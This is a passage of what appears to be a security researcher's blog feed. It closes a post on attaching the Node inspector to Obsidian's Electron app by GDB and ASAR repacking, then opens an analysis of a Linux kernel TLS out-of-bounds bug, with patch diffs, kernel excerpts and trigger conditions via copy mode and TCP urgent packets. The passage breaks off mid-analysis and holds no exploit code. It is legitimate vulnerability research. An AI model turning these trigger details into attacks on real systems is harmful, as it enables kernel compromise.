      <span class="n">CHECK</span><span class="p">(</span><span class="o">!</span><span class="n">parent_env_</span><span class="o">-&gt;</span><span class="n">has_serialized_options</span><span class="p">());</span>
      <span class="n">debug_options_</span><span class="p">.</span><span class="n">EnableBreakFirstLine</span><span class="p">();</span>
      <span class="n">parent_env_</span><span class="o">-&gt;</span><span class="n">options</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">get_debug_options</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">EnableBreakFirstLine</span><span class="p">();</span>
    <span class="p">}</span>
    <span class="n">client_</span><span class="o">-&gt;</span><span class="n">waitForFrontend</span><span class="p">();</span>
    <span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
  <span class="p">}</span>
  <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>To enable it, we just need to run one additional GDB command:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>set *(char *)($rdx + 12)=1
</code></pre></div></div>

<p>Now the Inspector will pause execution and wait for us to attach the debugger!</p>

<p><img src="/assets/image-20260118134544951.png" alt="image-20260118134544951" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<h3 id="322-static-patch">3.2.2. Static Patch</h3>

<p>When I was writing this post, I found an easier way to start the Inspector lol. Since we can repack the ASAR file, we just need to add the following two lines of JS code to <code class="language-plaintext highlighter-rouge">main.js</code>:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">inspector</span><span class="dl">'</span><span class="p">).</span><span class="nx">open</span><span class="p">(</span><span class="mi">9229</span><span class="p">,</span> <span class="dl">'</span><span class="s1">127.0.0.1</span><span class="dl">'</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
<span class="k">debugger</span><span class="p">;</span>
</code></pre></div></div>

<p>Repacking ASAR files is straightforward:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cd</span> /opt/Obsidian/resources
npx asar extract app.asar ~/Downloads/app.unpacked
<span class="c"># ... patch file</span>
npx asar pack ~/app.unpacked app.asar
<span class="nb">cp </span>app.asar /opt/Obsidian/resources/app.asar
</code></pre></div></div>

<p>The Inspector will be launched as well.</p>

<p><img src="/assets/image-20260118140737247.png" alt="image-20260118140737247" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>WOW, I feel like a stupid guy XD</p>

<h3 id="33-find-vulnerabilities">3.3. Find Vulnerabilities</h3>

<p>By searching for the string <code class="language-plaintext highlighter-rouge">"second-instance"</code> or <code class="language-plaintext highlighter-rouge">"open-url"</code>, you can easily locate the handler and start analyzing the minified JS code.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// main.js (obsidian.asar)</span>
<span class="nx">i</span><span class="p">.</span><span class="nx">app</span><span class="p">.</span><span class="nx">whenReady</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="nx">i</span><span class="p">.</span><span class="nx">app</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="dl">"</span><span class="s2">second-instance</span><span class="dl">"</span><span class="p">,</span> <span class="p">(</span><span class="nx">e</span><span class="p">,</span> <span class="nx">t</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
        <span class="nx">Ve</span><span class="p">(</span><span class="nx">t</span><span class="p">)</span> <span class="o">||</span> <span class="nx">Z</span><span class="p">()</span>
    <span class="p">});</span>
    <span class="c1">// [...]</span>
<span class="p">)</span>

<span class="cm">/* ...*/</span> <span class="nx">i</span><span class="p">.</span><span class="nx">app</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="dl">"</span><span class="s2">open-url</span><span class="dl">"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">,</span> <span class="nx">t</span><span class="p">)</span> <span class="p">{</span>
            <span class="nx">e</span><span class="p">.</span><span class="nx">preventDefault</span><span class="p">(),</span> <span class="nx">he</span><span class="p">(</span><span class="nx">t</span><span class="p">)</span>
         <span class="p">}),</span> <span class="cm">/* ... */</span>
<span class="c1">// [...]</span>
</code></pre></div></div>

<p>In fact, I don’t really have any experience finding protocol handler vulnerabilities, and I didn’t even find any web bugs, so… there are that many things to share in this part :p. However, the protocol handlers have been a widely known attack surface for a long time, and you can find plenty of resources discussing them. For example, Obsidian previously had <a href="https://forum.obsidian.md/t/possible-remote-code-execution-through-obsidian-uri-scheme/39743">a potential RCE vulnerability</a>, which happened in the <code class="language-plaintext highlighter-rouge">hook-get-address</code> command handler.</p>

<p>If you can execute arbitrary JS code or HTML (via XSS, markdown features, …) in an Electron application, it may lead to unexpected problems. In worst case, an attacker can run call arbitrary Node.js APIs and run system commands. <a href="https://lsgeurope.com/post/0-click-rce-in-electron-applications">This post</a> explains several scenarios where unsafe Electron configurations can result in pretty bad problems.</p>

<p>There are three relatively important attributes in the Electron <code class="language-plaintext highlighter-rouge">webPreferences</code> configuration:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">nodeIntegration</code>: whether the renderer process can call Node.js APIs.</li>
  <li><code class="language-plaintext highlighter-rouge">sandbox</code>: whether the renderer process runs in OS-level sandbox and can only access limited resources.</li>
  <li><code class="language-plaintext highlighter-rouge">contextIsolation</code>: whether the web page’s JS code is prevented from polluting the global JS environment, such as hijacking preloaded JS code.</li>
</ul>

<p>I draw a simple map to show where we should focus when looking at an Electron application:</p>

<p><img src="/assets/image-20260118215012083.png" alt="image-20260118215012083" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>I’m working on it and hope to share somethings interesting in the future!</p>

<h2 id="4-conclusion">4. Conclusion</h2>

<p>I think writing blogs is still beneficial, not only for sharing technical ideas, but also for organizing what I’ve learned. Hope I can keep doing this throughout the year!</p>]]></content><author><name></name></author><category term="Web" /><summary type="html"><![CDATA[0. Murmur]]></summary></entry><entry><title type="html">Analyze Linux Kernel 1-day 0aeb54ac</title><link href="https://u1f383.github.io/linux/2025/10/03/analyze-linux-kernel-1-day-0aeb54ac.html" rel="alternate" type="text/html" title="Analyze Linux Kernel 1-day 0aeb54ac" /><published>2025-10-03T00:00:00+00:00</published><updated>2025-10-03T00:00:00+00:00</updated><id>https://u1f383.github.io/linux/2025/10/03/analyze-linux-kernel-1-day-0aeb54ac</id><content type="html" xml:base="https://u1f383.github.io/linux/2025/10/03/analyze-linux-kernel-1-day-0aeb54ac.html"><![CDATA[<p>One day, @farazsth98 asked me if I had analyzed the latest 1-day kernelCTF slot. I hadn’t analyzed it yet, but I thought it was a good time to do something interesting — especially since preparing a talk is exhausting 😭.</p>

<p>The vulnerability occurred in the TLS subsystem, and its <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0aeb54ac4cd5cf8f60131b4d9ec0b6dc9c27b20d">commit</a> revealed many details about the triggering scenario.</p>

<p>This post is just a quick note about my reproduction, so it helps if you already have some background knowledge of TLS before reading.</p>

<p>Some of my previous posts might also be useful:</p>

<ul>
  <li><a href="/linux/2025/01/20/linux-kernel-tls-part-1.html">Linux Kernel TLS Part 1</a></li>
  <li><a href="/linux/2025/01/21/linux-kernel-tls-part-2.html">Linux Kernel TLS Part 2</a></li>
  <li><a href="/linux/2025/09/03/analysis-of-CVE-2025-37756-an-uaf-vulnerability-in-linux-ktls.html">Analysis of CVE-2025-37756, an UAF Vulnerability in Linux KTLS</a></li>
</ul>

<h2 id="1-patch-analysis">1. Patch Analysis</h2>

<h3 id="11-key-problem">1.1. Key Problem</h3>

<p>The patch updates several files, but the core issue lies in <code class="language-plaintext highlighter-rouge">tls_rx_msg_size()</code>.</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">@@ -2474,8 +2474,7 @@</span> int tls_rx_msg_size(struct tls_strparser *strp, struct sk_buff *skb)
     return data_len + TLS_HEADER_SIZE;
 
 read_failure:
<span class="gd">-    tls_err_abort(strp-&gt;sk, ret);
-
</span><span class="gi">+    tls_strp_abort_strp(strp, ret);
</span>     return ret;
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">tls_rx_msg_size()</code> function is used to calculate the total TLS record size from the header [1]. Before the patch, if the size was too small [2] or too large [3], <code class="language-plaintext highlighter-rouge">tls_err_abort()</code> was called to set the socket error state [4].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">tls_rx_msg_size</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">data_len</span> <span class="o">=</span> <span class="p">((</span><span class="n">header</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mh">0xFF</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span><span class="p">));</span> <span class="c1">// [1]</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">data_len</span> <span class="o">&gt;</span> <span class="n">TLS_MAX_PAYLOAD_SIZE</span> <span class="cm">/* 0x4000 */</span> <span class="o">+</span> <span class="n">cipher_overhead</span> <span class="o">+</span> <span class="c1">// [2]</span>
        <span class="n">prot</span><span class="o">-&gt;</span><span class="n">tail_size</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">EMSGSIZE</span><span class="p">;</span>
        <span class="k">goto</span> <span class="n">read_failure</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">data_len</span> <span class="o">&lt;</span> <span class="n">cipher_overhead</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// [3]</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">EBADMSG</span><span class="p">;</span>
        <span class="k">goto</span> <span class="n">read_failure</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// [...]</span>
<span class="nl">read_failure:</span>
    <span class="n">tls_err_abort</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="p">,</span> <span class="n">ret</span><span class="p">);</span>

    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="n">noinline</span> <span class="kt">void</span> <span class="nf">tls_err_abort</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="kt">int</span> <span class="n">err</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">sk</span><span class="o">-&gt;</span><span class="n">sk_err</span><span class="p">,</span> <span class="o">-</span><span class="n">err</span><span class="p">);</span> <span class="c1">// [4]</span>
    <span class="c1">// [...]</span>
    <span class="n">sk_error_report</span><span class="p">(</span><span class="n">sk</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After the patch, the call to <code class="language-plaintext highlighter-rouge">tls_err_abort()</code> is replaced with <code class="language-plaintext highlighter-rouge">tls_strp_abort_strp()</code>.</p>

<p>Unlike <code class="language-plaintext highlighter-rouge">tls_err_abort()</code>, <code class="language-plaintext highlighter-rouge">tls_strp_abort_strp()</code> not only sets the socket error state, but also <strong>stops the TLS stream parser</strong> [5].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">tls_strp_abort_strp</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="kt">int</span> <span class="n">err</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stopped</span><span class="p">)</span>
        <span class="k">return</span><span class="p">;</span>

    <span class="n">strp</span><span class="o">-&gt;</span><span class="n">stopped</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// [5]</span>
    <span class="c1">// [...]</span>
    <span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="o">-&gt;</span><span class="n">sk_err</span><span class="p">,</span> <span class="o">-</span><span class="n">err</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">sk_error_report</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If the <code class="language-plaintext highlighter-rouge">stopped</code> flag is set [6], the TLS packet receive callback <code class="language-plaintext highlighter-rouge">tls_strp_read_sock()</code> will no longer be invoked [7], effectively preventing the TLS parser from processing further packets.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">tls_strp_check_rcv</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stopped</span><span class="p">)</span> <span class="cm">/* [6] */</span> <span class="o">||</span> <span class="n">strp</span><span class="o">-&gt;</span><span class="n">msg_ready</span><span class="p">)</span>
        <span class="k">return</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">tls_strp_read_sock</span><span class="p">(</span><span class="n">strp</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">)</span> <span class="c1">// [7]</span>
        <span class="n">queue_work</span><span class="p">(</span><span class="n">tls_strp_wq</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">work</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The only affected path is <code class="language-plaintext highlighter-rouge">tls_strp_copyin_frag()</code>. Since its call to <code class="language-plaintext highlighter-rouge">tls_rx_msg_size()</code> would previously return an error <strong>without setting the <code class="language-plaintext highlighter-rouge">stopped</code> flag</strong>, the function could be triggered repeatedly, leading to unintended side effects.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_copyin_frag</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">in_skb</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">offset</span><span class="p">,</span>
                <span class="kt">size_t</span> <span class="n">in_len</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// [...]</span>
        <span class="n">sz</span> <span class="o">=</span> <span class="n">tls_rx_msg_size</span><span class="p">(</span><span class="n">strp</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">sz</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
            <span class="k">return</span> <span class="n">sz</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="12-exploit-path">1.2. Exploit Path</h3>

<p>The patch for socket fragment handling in <code class="language-plaintext highlighter-rouge">tls_strp_copyin_frag()</code> prevents the exploitation path.</p>

<p>Previously, developers assumed that <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> was bounded by the maximum value <code class="language-plaintext highlighter-rouge">TLS_MAX_PAYLOAD_SIZE</code>, and therefore <strong>did not further validate the calculated fragment index</strong>.</p>

<p>However, because <code class="language-plaintext highlighter-rouge">tls_strp_copyin_frag()</code> could be invoked multiple times, <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> may grow excessively. As a result, the fragment index could <strong>become larger than the total fragment count</strong>, leading to out-of-bounds memory access or the use of uninitialized memory.</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">@@ -211,11 +211,17 @@</span> static int tls_strp_copyin_frag(struct tls_strparser *strp, struct sk_buff *skb,
                 struct sk_buff *in_skb, unsigned int offset,
                 size_t in_len)
 {
<span class="gi">+    unsigned int nfrag = skb-&gt;len / PAGE_SIZE;
</span>     size_t len, chunk;
     skb_frag_t *frag;
     int sz;
 
<span class="gd">-    frag = &amp;skb_shinfo(skb)-&gt;frags[skb-&gt;len / PAGE_SIZE];
</span><span class="gi">+    if (unlikely(nfrag &gt;= skb_shinfo(skb)-&gt;nr_frags)) {
+        DEBUG_NET_WARN_ON_ONCE(1);
+        return -EMSGSIZE;
+    }
+
+    frag = &amp;skb_shinfo(skb)-&gt;frags[nfrag];
</span></code></pre></div></div>

<p>This patch introduces stricter validation of the packet length to ensure safer fragment handling.</p>

<h2 id="2-trigger-the-vulnerability">2. Trigger the Vulnerability</h2>

<p>Two conditions must be satisfied to trigger the vulnerability:</p>
<ol>
  <li>TLS stream copy mode (<code class="language-plaintext highlighter-rouge">strp-&gt;copy_mode</code>) is enabled.</li>
  <li>The packet length <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> is sufficiently small.</li>
</ol>

<h3 id="21-enabling-stream-copy-mode">2.1. Enabling Stream Copy Mode</h3>

<p>When the <strong>receive buffer becomes insufficient</strong> [1], the TLS parser enables copy mode [2] and uses <code class="language-plaintext highlighter-rouge">tls_strp_read_copyin()</code> to process subsequent packets [3, 4].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_read_copy</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="n">bool</span> <span class="n">qshort</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">likely</span><span class="p">(</span><span class="n">qshort</span> <span class="cm">/* true */</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">tcp_epollin_ready</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="p">,</span> <span class="n">INT_MAX</span><span class="p">)))</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

    <span class="c1">// [...]</span>
    <span class="n">strp</span><span class="o">-&gt;</span><span class="n">copy_mode</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// [2]</span>
    
    <span class="c1">// [...]</span>
    <span class="n">tls_strp_read_copyin</span><span class="p">(</span><span class="n">strp</span><span class="p">);</span> <span class="c1">// [3]</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">inline</span> <span class="n">bool</span> <span class="nf">tcp_epollin_ready</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="kt">int</span> <span class="n">target</span> <span class="cm">/* INT_MAX */</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">const</span> <span class="k">struct</span> <span class="n">tcp_sock</span> <span class="o">*</span><span class="n">tp</span> <span class="o">=</span> <span class="n">tcp_sk</span><span class="p">(</span><span class="n">sk</span><span class="p">);</span>
    <span class="kt">int</span> <span class="n">avail</span> <span class="o">=</span> <span class="n">READ_ONCE</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">rcv_nxt</span><span class="p">)</span> <span class="o">-</span> <span class="n">READ_ONCE</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">copied_seq</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">avail</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">)</span>
        <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>

    <span class="k">return</span> <span class="p">(</span><span class="n">avail</span> <span class="o">&gt;=</span> <span class="n">target</span><span class="p">)</span> <span class="o">||</span> <span class="n">tcp_rmem_pressure</span><span class="p">(</span><span class="n">sk</span><span class="p">)</span> <span class="cm">/* [1] */</span> <span class="o">||</span>
           <span class="p">(</span><span class="n">tcp_receive_window</span><span class="p">(</span><span class="n">tp</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="n">inet_csk</span><span class="p">(</span><span class="n">sk</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">icsk_ack</span><span class="p">.</span><span class="n">rcv_mss</span><span class="p">);</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_read_sock</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">copy_mode</span><span class="p">))</span>
        <span class="k">return</span> <span class="n">tls_strp_read_copyin</span><span class="p">(</span><span class="n">strp</span><span class="p">);</span> <span class="c1">// [4]</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="22-small-packet-size">2.2. Small Packet Size</h3>

<p>The value of <code class="language-plaintext highlighter-rouge">strp-&gt;stm.full_len</code> depends on the return value of <code class="language-plaintext highlighter-rouge">tls_rx_msg_size()</code> [1].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_read_sock</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">sz</span> <span class="o">=</span> <span class="n">tls_rx_msg_size</span><span class="p">(</span><span class="n">strp</span><span class="p">,</span> <span class="n">strp</span><span class="o">-&gt;</span><span class="n">anchor</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">sz</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">tls_strp_abort_strp</span><span class="p">(</span><span class="n">strp</span><span class="p">,</span> <span class="n">sz</span><span class="p">);</span>
            <span class="k">return</span> <span class="n">sz</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span> <span class="o">=</span> <span class="n">sz</span><span class="p">;</span> <span class="c1">// [1]</span>
        <span class="c1">// [...]</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The function <code class="language-plaintext highlighter-rouge">tls_rx_msg_size()</code> returns 0 as the packet size only when the packet is <strong>still too small to be parsed</strong> [2].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">tls_rx_msg_size</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">tls_context</span> <span class="o">*</span><span class="n">tls_ctx</span> <span class="o">=</span> <span class="n">tls_get_ctx</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="p">);</span>
    <span class="k">struct</span> <span class="n">tls_prot_info</span> <span class="o">*</span><span class="n">prot</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">tls_ctx</span><span class="o">-&gt;</span><span class="n">prot_info</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">header</span><span class="p">[</span><span class="n">TLS_HEADER_SIZE</span> <span class="o">+</span> <span class="n">TLS_MAX_IV_SIZE</span><span class="p">];</span>
    <span class="kt">size_t</span> <span class="n">cipher_overhead</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">data_len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">ret</span><span class="p">;</span>

    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">offset</span> <span class="o">+</span> <span class="n">prot</span><span class="o">-&gt;</span><span class="n">prepend_size</span> <span class="cm">/* 13 */</span> <span class="o">&gt;</span> <span class="n">skb</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">)</span> <span class="c1">// [2]</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>However, these two conditions <strong>appear to conflict</strong> 🤯: if the packet size is too small, the receive buffer will remain empty, and copy mode will not be enabled.</p>

<h2 id="23-oob-packet">2.3. OOB Packet</h2>

<p><strong>Out-of-band (OOB)</strong>, also known as <strong>Urgent</strong>, is a packet type used to notify the receiver of an emergency condition. This type of packet contains only a single byte of data and has higher priority than a normal packet.</p>

<p><code class="language-plaintext highlighter-rouge">tcp_rcv_established()</code> calls <code class="language-plaintext highlighter-rouge">tcp_urg()</code> to handle urgent packets before calling <code class="language-plaintext highlighter-rouge">tcp_data_queue()</code> to process regular data.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">tcp_rcv_established</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">tcp_urg</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">skb</span><span class="p">,</span> <span class="n">th</span><span class="p">);</span>
    
    <span class="c1">// [...]</span>
    <span class="n">tcp_data_queue</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
    
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">tcp_urg()</code> first checks whether the packet is an urgent packet by calling <code class="language-plaintext highlighter-rouge">tcp_check_urg()</code>. If it is, the urgent packet sequence <code class="language-plaintext highlighter-rouge">tp-&gt;urg_seq</code> is updated [1], and <code class="language-plaintext highlighter-rouge">tls_strp_read_sock()</code> is invoked internally [2].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">tcp_urg</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">tcphdr</span> <span class="o">*</span><span class="n">th</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">tcp_sock</span> <span class="o">*</span><span class="n">tp</span> <span class="o">=</span> <span class="n">tcp_sk</span><span class="p">(</span><span class="n">sk</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">th</span><span class="o">-&gt;</span><span class="n">urg</span><span class="p">))</span>
        <span class="n">tcp_check_urg</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">th</span><span class="p">);</span>
    
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_data</span> <span class="o">==</span> <span class="n">TCP_URG_NOTYET</span><span class="p">))</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">ptr</span> <span class="o">&lt;</span> <span class="n">skb</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">)</span> <span class="p">{</span>
            <span class="c1">// [...]</span>
            <span class="n">skb_copy_bits</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">ptr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">tmp</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
            <span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">tp</span><span class="o">-&gt;</span><span class="n">urg_data</span><span class="p">,</span> <span class="n">TCP_URG_VALID</span> <span class="o">|</span> <span class="n">tmp</span><span class="p">);</span>
            <span class="n">sk</span><span class="o">-&gt;</span><span class="n">sk_data_ready</span><span class="p">(</span><span class="n">sk</span><span class="p">);</span> <span class="c1">// [2]</span>
            <span class="c1">// [...]</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

